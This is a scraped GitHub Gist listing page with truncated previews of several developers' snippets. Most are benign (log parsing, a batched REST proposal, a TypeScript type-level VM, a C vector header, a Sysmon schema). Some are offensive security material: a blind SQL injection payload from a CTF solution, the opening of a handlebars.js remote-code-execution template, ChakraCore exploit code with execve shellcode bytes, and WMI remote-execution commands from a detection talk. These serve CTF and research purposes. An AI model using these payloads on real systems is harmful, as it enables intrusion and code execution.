Skip to content

Instantly share code, notes, and snippets.

💭
offline

evandrix evandrix

💭
offline
Block or report user

Report or block evandrix

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@terjanq
terjanq / exploit.js
Last active Oct 7, 2019
This is a solution of Oracle v2 and Oracle v1 from https://nn9ed.ka0labs.org/challenges#x-oracle%20v2 (I realized I could use <meta> and redirect admin to my website and run the challenge in iframes after I already solved it with bruteforcing the admin :p)
View exploit.js
const fetch = require('node-fetch');
var flag = 'nn9ed{'
var alph = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!().{}'
var escape = d => d.replace(/\\/g, '\\\\').replace(/\./g, '\\.').replace(/\(/g, '\\(').replace(/\)/g, '\\)').replace(/\{/g, '\\{').replace(/\}/g, '\\}');
var make_payload = (i, o) => `Season 6%' AND 1=IF(ORD(SUBSTR(flag,${i},1))=${o},1,EXP(44444)) #` // throws an exception if the character of flag is incorrect
const base_url = 'http://x-oracle-v2.nn9ed.ka0labs.org/'
// Generates definitions for fonts
function generateFonts() {
View log-parsing.cpp
/*
* Given a log line that starts like this:
*
* 2014.01.27 19:35:51.639 (UTC-1) 3 1 ...
*
* the following takes about ~60 ms per call in a release build
* produced by a VC++ 2017 using its stock CRT (v141):
*/
sscanf(line,
View Batched REST example.md

A Proposal for Batched REST

An alternative to both REST & GraphQL, combining the benefits of each, based on https://tools.ietf.org/id/draft-snell-http-batch-00.html.

Batch multiple related requests into one HTTP request, which can be sent once & processed once on the server-side, but otherwise keep all the benefits of REST & HTTP. This is one single raw HTTP request:

POST /batch
Host: example.com
Content-Type: multipart/batch
@acutmore
acutmore / README.md
Last active Oct 16, 2019
Emulating a 4-Bit Virtual Machine in (TypeScript\JavaScript) (just Types no Script)
View README.md

A compile-time 4-Bit Virtual Machine implemented in TypeScript's type system. Capable of running a sample 'FizzBuzz' program.

Syntax emits zero JavaScript.

type RESULT = VM<
  [
    ["push", N_1],         // 1
    ["push", False],       // 2
    ["peek", _],           // 3
@itszn
itszn / 0day.handlebars
Created Sep 16, 2019
handlebars.js rce 0day
View 0day.handlebars
//First we want to create an array
{{#with "a" as |str|}}
{{#with split as |list|}}
//Store some function that returns a truthy value into the array
//We use arrays to hold functions because handlebars will call functions
{{this.pop}}
{{this.push this.toString}}
{{this.pop}}
@itszn
itszn / exploit.js
Last active Sep 18, 2019
Trendmicro CTF ChakraCore exploit
View exploit.js
let sc = [106,104,72,184,47,98,105,110,47,47,47,115,80,72,137,231,104,114,105,1,1,129,52,36,1,1,1,1,49,246,86,106,8,94,72,1,230,86,72,137,230,49,210,106,59,88,15,5];
let conva = new ArrayBuffer(8)
let convi = new Uint32Array(conva);
let convf = new Float64Array(conva);
function i2f(i) {
convi[0] = i%0x100000000;
convi[1] = i/0x100000000;
return convf[0];
@mattifestation
mattifestation / HowToDetectTechniqueX_Demos.ps1
Created Sep 6, 2019
Demo code from my DerbyCon talk: "How do I detect technique X in Windows?" Applied Methodology to Definitively Answer this Question
View HowToDetectTechniqueX_Demos.ps1
#region Attack validations
wmic /node:169.254.37.139 /user:Administrator /password:badpassword process call create notepad.exe
Invoke-WmiMethod -ComputerName 169.254.37.139 -Credential Administrator -Class Win32_Process -Name Create -ArgumentList notepad.exe
$CimSession = New-CimSession -ComputerName 169.254.37.139 -Credential Administrator
Invoke-CimMethod -CimSession $CimSession -ClassName Win32_Process -MethodName Create -Arguments @{ CommandLine = 'notepad.exe' }
$CimSession | Remove-CimSession
winrm --% invoke Create wmicimv2/Win32_Process @{CommandLine="notepad.exe"} -remote:169.254.37.139 -username:Administrator -password:badpassword
@Unlimiter
Unlimiter / uv.h
Last active Oct 4, 2019
Vector definitions for C.
View uv.h
/*
MIT License
Copyright (c) 2019 Unlimiter
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
@hasherezade
hasherezade / main.cpp
Created Aug 27, 2019
Flare-On Task 10 - solution
View main.cpp
#include <Windows.h>
#include <iostream>
#include <cstdlib>
#include <cstdio>
#include <ctime>
void decipher(DWORD* v, BYTE *k)
{
unsigned int num_rounds = 32;
unsigned int i;
View sysmon-104-schema.xml
<manifest schemaversion="4.22" binaryversion="9.20">
<configuration>
<options>
<!-- Command-line only options -->
<option switch="i" name="Install" argument="optional" noconfig="true" exclusive="true" />
<option switch="c" name="Configuration" argument="optional" noconfig="true" exclusive="true" />
<option switch="u" name="UnInstall" argument="optional" noconfig="true" exclusive="true" />
<option switch="m" name="Manifest" argument="none" noconfig="true" exclusive="true" />
<option switch="t" name="DebugMode" argument="optional" noconfig="true" />
<option switch="s" name="PrintSchema" argument="optional" noconfig="true" exclusive="true" />
You can’t perform that action at this time.